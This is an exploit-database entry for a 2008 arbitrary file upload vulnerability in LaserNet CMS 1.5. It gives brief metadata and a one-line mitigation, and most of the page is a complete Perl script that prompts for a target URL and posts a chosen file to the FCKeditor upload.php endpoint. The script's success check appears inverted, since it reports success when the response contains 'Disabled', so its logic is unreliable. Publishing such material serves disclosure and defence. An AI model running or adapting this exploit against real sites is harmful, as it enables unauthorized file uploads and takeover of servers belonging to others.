LaserNet CMS - exploit.company

vendor:

CMS

by:

t0pP8uZz

7.5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: CMS

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

LaserNet CMS <= 1.5 Arbitrary File Upload Exploit

This exploit allows an attacker to upload arbitrary files to the LaserNet CMS version 1.5. The exploit works by sending a POST request to the upload.php file in the FCKeditor directory. If the file upload is enabled, the attacker can upload any file to the server. If the file upload is disabled, the exploit will fail.

Mitigation:

Disable file uploads in the LaserNet CMS version 1.5.

Source

Exploit-DB raw data:

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LaserNet CMS <= 1.5 Arbitrary File Upload Exploit +
+                                                   +
+         Discovered && Coded By: t0pP8uZz          +
+    Discovered On: 19 JUNE 2008 / milw0rm.com      +
+    Script Download: http://lasernet.gr/cms.php    +
+++++++++++++++++++++++++++++++++++++++++++++++++++++

INTRO

print "Enter URL(ie: http://site.com): ";
    chomp(my $url=<STDIN>);
    
print "Enter File Path(path to local file to upload): ";
    chomp(my $file=<STDIN>);

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
                      Content_Type => 'form-data',
                      Content      => [ NewFile => $file ] );

if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
    else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }

exit;

# milw0rm.com [2008-06-21]